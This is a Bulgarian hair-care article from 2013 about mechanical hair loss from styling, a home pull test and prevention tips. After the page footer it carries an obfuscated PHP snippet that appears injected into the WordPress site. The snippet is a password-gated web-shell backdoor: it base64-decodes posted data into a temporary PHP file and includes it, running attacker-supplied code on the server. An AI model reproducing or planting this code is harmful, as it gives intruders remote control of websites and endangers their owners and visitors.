Как да направите домашен тест за косопад | Косопад

Как да направите домашен тест за косопад

косопадПрекаляването с козметичните разкрасяващи процедури е пагубно за косата и може да доведе до косопад. Употребата на твърде много шампоан, ежедневният стайлинг и честото боядисване увреждат вашите кичури, а топлината и химикалите правят космите слаби, те се чупят и падат.

Експертите обясняват, че в такива ситуации се наблюдава механичен косопад при около 55 % от жените. Дължи се на негативния ефект, който стайлингът оказва. Например химическите бои изтощават, сушенето със сешоар или извайването на красиви къдрици с маша дехидратират, като по този начин нанасят непоправими щети.

Симптомите са лесни за откриване. Обичайно космите от главата започват да падат доста по – лесно от обикновено и за кратки срокове се развива неприятен дифузен косопад (равномерно изтъняване).

Тест за косопад (homemade)

При посещение лекарят може да установи проблема чрез т. н. „разтегателен” тест. Хваща малък кичур коса и леко дърпа. Ако падналите косми са без корен в единия край бъдете сигурни, че вашият случай е именно такъв – косъмът е слаб и лесно се къса. Този тест можете да проведете напълно спокойно и сами, но все пак е препоръчително да отидете на лекар.

За да се предпазите следвайте няколко прости правила. На първо място избягвайте употреба на уреди, които затоплят. Ако пък държите да използвате сешоар, дръжте го възможно най – далеко от главата и настройте с възможно най – студен въздух.

Също така не боядисвайте повече от един или два нюанса от нормалния цвят. Колкото по – тежка е промяната, толкова повече химикали са необходими, за осъществяване на вашето желание. Защото може да се „изгорите”, а почти всички дами знаят какви са последствията – гарантиран косопад.

Силно препоръчително е да третирате с подходящи домашни рецепти, които дори и да не лекуват, имат свойството да предпазват. Особено полезни са алое вера, коприва, мед, яйца и др. (рецепти за маски срещу косопад)

Косата е огледално отражение на цялостното здравословно състояние. Изхождайки от това научно обосновано твърдение е лесно да се сетите, че ако не живеете добре и прическата ви няма да бъде на високо ниво. Изхвърлете ненужните и вредни продукти от хранителното меню, като ги замените с полезни и чисти храни. Също така не забравяйте и за спорта – движението помага на цялото тяло да се справя с трудностите от ежедневието, пречиства кръвта и съзнанието.

16. септември 2013 13:54:10 от Косопад
Категории: Косопад – Статии | Етикети: | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}